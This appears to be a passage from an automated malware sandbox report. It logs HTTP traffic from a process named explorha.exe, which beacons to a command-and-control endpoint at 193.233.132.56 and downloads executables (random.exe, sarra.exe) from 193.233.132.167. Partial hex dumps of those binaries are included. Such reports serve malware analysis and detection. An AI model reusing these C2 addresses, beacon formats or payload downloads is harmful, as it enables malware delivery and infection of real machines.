                                                                                                                                                                                                                                      Apr 19, 2024 03:29:12.261015892 CEST1289INData Raw: 6b 10 04 00 8b 4f d4 85 c9 0f 85 75 10 04 00 33 db 89 5f dc 8b 4f c4 85 c9 0f 85 e3 01 00 00 8d 4f a4 89 5f cc e8 60 83 00 00 8d 8f 80 fe ff ff e8 0a 04 00 00 8d b7 64 fe ff ff 8b ce c7 06 3c c9 49 00 e8 88 02 00 00 ff 76 04 e8 bf e8 01 00 59 8d
                                                                                                                                                                                                                                      Data Ascii: kOu3_OO_`d<IvY|#l)\DItvL@IY9TPTX<@IY9D@D.,@IY94
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:12.261055946 CEST1289INData Raw: 7b 0d 00 8b 7b 08 75 29 8b 45 08 8b cf 8b 30 e8 7e b5 00 00 89 37 c7 47 0c 01 00 00 00 8b 43 08 80 7b 0d 00 5f 5e 5b 75 0d c6 40 10 00 5d c2 08 00 8b 7f 38 eb d2 8b 40 38 eb ee 33 c0 c7 05 80 18 4d 00 64 00 00 00 33 c9 66 a3 32 15 4d 00 41 a2 34
                                                                                                                                                                                                                                      Data Ascii: {{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj8M<M@MPMfMMMXMDMHMLMUWrVj@YuON8w^_]UVuWVgFO GF
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:12.261094093 CEST1289INData Raw: 00 50 57 8b f1 e8 4e 00 00 00 85 c0 78 38 8b 4f 04 8b 45 f8 8b 04 81 66 83 78 08 7f 0f 85 33 08 04 00 80 7d ff 00 8d 8e 64 01 00 00 75 1e 80 be 6d 01 00 00 00 8b 8e 68 01 00 00 75 16 8b 49 04 8b 45 0c 41 89 08 5f 5e c9 c2 08 00 e8 de 08 00 00 eb
                                                                                                                                                                                                                                      Data Ascii: PWNx8OEfx3}dumhuIEA_^I0UeEeVEVPuuxMM3M^At)ttH9AxUSVu3W
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:12.261130095 CEST1289INData Raw: ff 89 5d fc 47 e8 ed 03 00 00 8b 85 70 ff ff ff 89 45 c0 8b 55 f8 e9 8a fe ff ff 8b 41 04 6a 7f 59 66 39 48 08 0f 85 bc 05 04 00 8b 45 fc 48 4f 83 bd 6c ff ff ff 00 89 45 fc 0f 84 83 03 04 00 80 bd 75 ff ff ff 00 8b 45 c0 0f 85 7b 03 04 00 8b 18
                                                                                                                                                                                                                                      Data Ascii: ]GpEUAjYf9HEHOlEuE{lepEE;&r8EE}TPGZEHXE!#AjYf9HmME@E0u]uE
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:12.261168003 CEST1289INData Raw: 8b c1 89 51 20 89 51 28 c3 55 8b ec 8b 45 08 85 c0 0f 8f 88 01 04 00 83 7d 0c 00 0f 85 a9 01 04 00 83 7d 10 00 75 34 83 7d 14 00 0f 85 b8 01 04 00 83 7d 18 00 0f 85 b7 01 04 00 83 7d 1c 00 0f 85 b6 01 04 00 83 7d 20 00 75 19 83 7d 24 00 0f 85 7e
                                                                                                                                                                                                                                      Data Ascii: Q Q(UE}}u4}}}} u}$~3] jjwsjjsjUVF}^W3jZQL>3YNF~F<BN$;|SA23~,FDMEuNGA;|u[_
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:12.261228085 CEST1289INData Raw: 5e c9 c2 10 00 55 8b ec 83 ec 74 53 56 33 db 8d 4d 94 57 89 5d 90 e8 14 7b 00 00 ff 75 08 8d 4d 90 c7 45 a4 34 cc 49 00 89 5d a8 89 5d ac 89 5d b0 88 5d b4 e8 78 1c 00 00 8b 4d 0c be 18 14 4d 00 8a 45 b4 88 01 8b ce e8 db 0b 00 00 68 9c ca 49 00
                                                                                                                                                                                                                                      Data Ascii: ^UtSV3MW]{uME4I]]]]xMMEhIM'nj5MM]]]& ]MiVMzEPM@hIMmSjEPEP/yMihtIME]EmSSEPEPxM
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:12.261266947 CEST1289INData Raw: 11 83 7e 04 00 75 0d 89 4e 04 ff 06 89 4e 08 5e 5d c2 04 00 8b 46 08 89 48 04 eb ee 55 8b ec b8 04 00 01 00 e8 ec eb 03 00 56 8d 45 fc 8b f2 50 8d 85 fc ff fe ff 50 68 ff 7f 00 00 ff 31 ff 15 68 c3 49 00 8b 45 fc 85 c0 74 05 33 c9 66 89 08 8d 8d
                                                                                                                                                                                                                                      Data Ascii: ~uNN^]FHUVEPPh1hIEt3fP7^VVYtf|F\u3fLF^UVW3FO;Qu_^]USVWueYN3C;FPiq?PFuCP
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:12.261307001 CEST1289INData Raw: 56 57 68 b4 03 00 00 33 db c7 44 24 14 a8 03 00 00 8d 44 24 18 8b f1 53 50 e8 de ea 01 00 83 c4 0c 39 9e 98 01 00 00 75 0b a1 e4 13 4d 00 89 86 98 01 00 00 39 9e a4 01 00 00 75 11 a1 e8 13 4d 00 89 86 a4 01 00 00 89 86 a8 01 00 00 39 9e b0 01 00
                                                                                                                                                                                                                                      Data Ascii: VWh3D$D$SP9uM9uM9uMSW[Md$$D$F@D$D$D$ qD$$=hMD$PjIhM_^[]U=hMV
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:12.503591061 CEST1289INData Raw: 41 fc 39 18 74 44 8b 01 6a 03 ff 10 ff 77 14 e8 b3 c0 01 00 59 8d 4f 18 89 5f 08 89 5f 0c 89 5f 10 89 5f 14 89 5f 4c 66 89 1f e8 64 2a 00 00 8d 4f 28 e8 7a da ff ff 39 5f 58 0f 87 f6 f6 03 00 8d 4f 50 5f 5b e9 3e da ff ff 50 e8 77 c0 01 00 59 eb
                                                                                                                                                                                                                                      Data Ascii: A9tDjwYO_____Lfd*O(z9_XOP_[>PwYUS]EVWhA@~7jV&tQWYY_^[]VWj^$MZu MMrZMhZM^ZMTZM


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      8192.168.2.549721193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:15.465560913 CEST186OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 31
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 64 31 3d 31 30 30 30 30 35 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                      Data Ascii: d1=1000055001&unit=246122658369
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:15.715399981 CEST193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 4 <c>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      9192.168.2.549722193.233.132.167804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:15.978332996 CEST56OUTGET /cost/random.exe HTTP/1.1
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221138000 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:16 GMT
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Content-Length: 2295808
                                                                                                                                                                                                                                      Last-Modified: Fri, 19 Apr 2024 00:36:37 GMT
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      ETag: "6621bc95-230800"
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 9f 1a ea 14 fe 74 b9 14 fe 74 b9 14 fe 74 b9 5f 86 77 b8 1f fe 74 b9 5f 86 71 b8 d4 fe 74 b9 5f 86 73 b8 15 fe 74 b9 d6 7f 89 b9 10 fe 74 b9 d6 7f 70 b8 07 fe 74 b9 d6 7f 77 b8 0e fe 74 b9 d6 7f 71 b8 4f fe 74 b9 5f 86 70 b8 0c fe 74 b9 5f 86 72 b8 15 fe 74 b9 5f 86 75 b8 0f fe 74 b9 14 fe 75 b9 34 ff 74 b9 e7 7c 7d b8 08 fe 74 b9 e7 7c 74 b8 15 fe 74 b9 e7 7c 8b b9 15 fe 74 b9 14 fe e3 b9 15 fe 74 b9 e7 7c 76 b8 15 fe 74 b9 52 69 63 68 14 fe 74 b9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 0c 9a 1f 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 34 11 00 00 32 04 00 00 00 00 00 00 10 58 00 00 10 00 00 00 50 11 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 58 00 00 04 00 00 0a 19 23 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 54 4d 57 00 4c 00 00 00 6d 10 15 00 95 00 00 00 00 50 14 00 ec b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 4d 57 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 4c 57 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 e4 13 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 14 00 00 10 00 00 00 3e 09 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ec b5 00 00 00 50 14 00 00 82 00 00 00 4e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 15 00 00 02 00 00 00 d0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 20 15 00 00 02 00 00 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 6a 77 79 65 79 6e 69 00 40 19 00 00 d0 3e 00 00 32 19 00 00 d4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 6f 65 75 71 78 77 62 00 10 00 00 00 10 58 00 00 02 00 00 00 06 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$Pttt_wt_qt_sttptwtqOt_pt_rt_utu4t|}t|tt|tt|vtRichtPELf'42XP@ X#@TMWLmPDMWLWt@ @>@.rsrcPN@.idata @ ) @ejwyeyni@>2@zoeuqxwbX#@
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221177101 CEST1289INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221215963 CEST1289INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221254110 CEST1289INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221295118 CEST1289INData Raw: 2c a8 8e c8 17 b8 c4 30 48 c8 c4 40 c2 1d d8 12 41 bb 50 42 93 52 02 fc b3 45 60 e9 01 b0 24 0f 28 20 4a 97 d2 40 18 b0 68 45 df 99 ae b1 22 30 96 06 1f 4d ef b2 88 df 90 1f 9e 63 a4 d0 e9 1e b9 44 df 28 ed 11 88 15 12 80 10 8c b3 b9 50 50 68 a0
                                                                                                                                                                                                                                      Data Ascii: ,0H@APBRE`$( J@hE"0McD(PPht@0 )L$&*/+,2^.H.O6.P"DBh@@=J!0P!`PB@>i%DpQB4B!$?%i#d)Bu|"$H
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221333981 CEST1289INData Raw: 15 f2 a7 45 a0 cd 60 25 3d 46 71 16 50 f6 ab b4 a2 4b 01 8a 7d 23 b8 d3 09 15 2b c6 50 87 35 ec ee cb 6a a7 5b 9b c8 05 8a 55 ee f1 a0 18 bc eb 65 03 1c f1 79 b0 07 ad e2 e5 0f a8 b6 9b 3d f8 e8 8a 55 c2 b6 08 b1 e2 7c 3f ed ec 55 eb 90 cf 50 01
                                                                                                                                                                                                                                      Data Ascii: E`%=FqPK}#+P5j[Uey=U|?UPb~/U;uPB#Hj=LbKmauV_^^$SbUA3dB]n_f591J$?v<=4"R<(.Vlzu+t$/z
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221373081 CEST1289INData Raw: 86 9a 39 92 92 cd b5 9f 70 23 84 e7 e0 89 86 f5 b7 3f eb 41 1e 04 31 00 f7 3b c7 0f 43 f0 24 81 fe 76 6e 83 8d 46 23 02 79 3b c6 0f 86 e3 a0 8d eb bf 85 f6 26 74 16 73 14 41 45 97 a0 c6 45 68 e4 3f 3c 39 1a 33 ff 15 04 84 e4 f6 53 51 1d 2c 06 25
                                                                                                                                                                                                                                      Data Ascii: 9p#?A1;C$vnF#y;&tsAEEh?<93SQ,%69;uPU)H\-PA#CP4RZr=)KIIHR/3;Pd710c>u0yjxE.^`^u=$H#`vP63@"Ut,AAQ
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221410990 CEST1289INData Raw: f0 14 2e 44 a2 5f b4 f1 8d f0 c2 b8 9c 9d d0 17 e6 2f 90 13 0c 56 c4 6f 72 d3 50 46 9c fd 0c 7d f7 04 e1 f2 27 2c 5e 51 c0 b5 3a ce e8 24 e3 56 9d a0 df 6a 0d 68 9c 31 64 52 6c 84 f2 41 aa eb 09 bd 91 7b 69 79 17 79 8b c8 13 1a 77 a9 28 c0 b9 5e
                                                                                                                                                                                                                                      Data Ascii: .D_/VorPF}',^Q:$Vjh1dRlA{iyyw(^ f~>,'?sTi"p)NlBU~UjAG:Jp,[@.Bb4#d,{ O4qw[tFr`GKPu{~a~O`hX3E
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221448898 CEST1289INData Raw: e8 56 b8 a4 39 38 51 7a 6a 1c 00 d7 50 9c a5 5e af 82 21 16 8b 33 c0 6f b1 ad 6c 30 4d 25 f0 f9 4a 5b f4 69 71 5c 5b 3e 43 e1 92 8e e5 d1 80 ad 33 10 95 5b ed 08 40 a7 91 50 79 24 2f 8d 7f e2 09 5b 76 a5 73 fb 80 ca 8d 75 e5 85 c9 00 79 34 f7 d9
                                                                                                                                                                                                                                      Data Ascii: V98QzjP^!3ol0M%J[iq\[>C3[@Py$/[vsuy4fNA*0lTNuN-*.0T;uT0W+tAlwOi4RJ|uIW}Ox*=uJK;J`
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221488953 CEST1289INData Raw: a0 00 b3 3c 4a 3b c7 26 74 2c c2 d0 1f 2b 26 5d f8 80 00 39 5e 10 72 5b 89 da 0a 78 08 ec 87 60 0e 33 d2 66 7a 89 18 59 eb 2e 72 f0 3b 18 d9 75 0d 4d 83 e3 98 d7 05 fb 06 7c 1c eb 93 83 49 dd 8e 33 3c 6a e2 e5 b7 f7 0d cf 21 b8 8b 18 d1 ff d8 6b
                                                                                                                                                                                                                                      Data Ascii: <J;&t,+&]9^r[x`3fzY.r;uM|I3<j!kW=m`'UAQ>[ZF?&`McO.rn,sA,{*Fg@+RI#HG1QCC$V%\PuBBn7si'O
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.464555979 CEST1289INData Raw: da 25 f6 73 c9 35 a0 90 dd b8 81 4a ec 95 33 83 f3 8d 71 d4 4b b4 c1 96 68 98 25 ba 97 1a d0 e0 53 70 0b 04 e8 52 ca f1 29 c6 d0 4c 76 50 ee 74 9c 72 8c aa fa 55 e0 97 e9 44 85 45 10 02 d3 64 84 0d 5b 10 e2 2e 2a 1d 27 66 92 94 af 28 4e 5c 45 48
                                                                                                                                                                                                                                      Data Ascii: %s5J3qKh%SpR)LvPtrUDEd[.*'f(N\EHJ7O?;P@i\<2='`OV@D4 .MB*lp"A#c x,Rl%sXHlNdm.dRx$r:AKpL|]6JnB|bmB$1P<fWf +I


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      10192.168.2.549741193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:21.206724882 CEST186OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 31
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 64 31 3d 31 30 30 30 30 35 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                      Data Ascii: d1=1000056001&unit=246122658369
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:21.453392029 CEST193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 4 <c>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      11192.168.2.549746193.233.132.167804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:21.996984005 CEST55OUTGET /cost/sarra.exe HTTP/1.1
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.245256901 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:22 GMT
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Content-Length: 2310656
                                                                                                                                                                                                                                      Last-Modified: Fri, 19 Apr 2024 00:36:46 GMT
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      ETag: "6621bc9e-234200"
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 9f 1a ea 14 fe 74 b9 14 fe 74 b9 14 fe 74 b9 5f 86 77 b8 1f fe 74 b9 5f 86 71 b8 d4 fe 74 b9 5f 86 73 b8 15 fe 74 b9 d6 7f 89 b9 10 fe 74 b9 d6 7f 70 b8 07 fe 74 b9 d6 7f 77 b8 0e fe 74 b9 d6 7f 71 b8 4f fe 74 b9 5f 86 70 b8 0c fe 74 b9 5f 86 72 b8 15 fe 74 b9 5f 86 75 b8 0f fe 74 b9 14 fe 75 b9 34 ff 74 b9 e7 7c 7d b8 08 fe 74 b9 e7 7c 74 b8 15 fe 74 b9 e7 7c 8b b9 15 fe 74 b9 14 fe e3 b9 15 fe 74 b9 e7 7c 76 b8 15 fe 74 b9 52 69 63 68 14 fe 74 b9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 0c 9a 1f 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 34 11 00 00 48 04 00 00 00 00 00 00 00 59 00 00 10 00 00 00 50 11 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 59 00 00 04 00 00 a3 8c 23 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 cc 4a 58 00 4c 00 00 00 5e 10 15 00 72 00 00 00 00 50 14 00 f8 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc 4a 58 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 4a 58 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 e4 13 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 14 00 00 10 00 00 00 3e 09 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f8 b2 00 00 00 50 14 00 00 80 00 00 00 4e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 15 00 00 02 00 00 00 ce 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 2a 00 00 20 15 00 00 02 00 00 00 d0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 61 76 6e 65 79 71 71 00 70 19 00 00 90 3f 00 00 6c 19 00 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 78 63 77 7a 66 70 63 00 10 00 00 00 00 59 00 00 04 00 00 00 3e 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$Pttt_wt_qt_sttptwtqOt_pt_rt_utu4t|}t|tt|tt|vtRichtPELf'4HYP@Y#@JXL^rPJXlJXt@ @>@.rsrcPN@.idata @ p* @oavneyqqp?l@ixcwzfpcY>#@
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.245326042 CEST1289INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.245364904 CEST1289INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.245404959 CEST1289INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.245444059 CEST1289INData Raw: 2c a8 8e c8 17 b8 c4 30 48 c8 c4 40 c2 1d d8 12 41 bb 50 42 93 52 02 fc b3 45 60 e9 01 b0 24 0f 28 20 4a 97 d2 40 18 b0 68 45 df 99 ae b1 22 30 96 06 1f 4d ef b2 88 df 90 1f 9e 63 a4 d0 e9 1e b9 44 df 28 ed 11 88 15 12 80 10 8c b3 b9 50 50 68 a0
                                                                                                                                                                                                                                      Data Ascii: ,0H@APBRE`$( J@hE"0McD(PPht@0 )L$&*/+,2^.H.O6.P"DBh@@=J!0P!`PB@>i%DpQB4B!$?%i#d)Bu|"$H
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.245482922 CEST1289INData Raw: 15 f2 a7 45 a0 cd 60 25 3d 46 71 16 50 f6 ab b4 a2 4b 01 8a 7d 23 b8 d3 09 15 2b c6 50 87 35 ec ee cb 6a a7 5b 9b c8 05 8a 55 ee f1 a0 18 bc eb 65 03 1c f1 79 b0 07 ad e2 e5 0f a8 b6 9b 3d f8 e8 8a 55 c2 b6 08 b1 e2 7c 3f ed ec 55 eb 90 cf 50 01
                                                                                                                                                                                                                                      Data Ascii: E`%=FqPK}#+P5j[Uey=U|?UPb~/U;uPB#Hj=LbKmauV_^^$SbUA3dB]n_f591J$?v<=4"R<(.Vlzu+t$/z
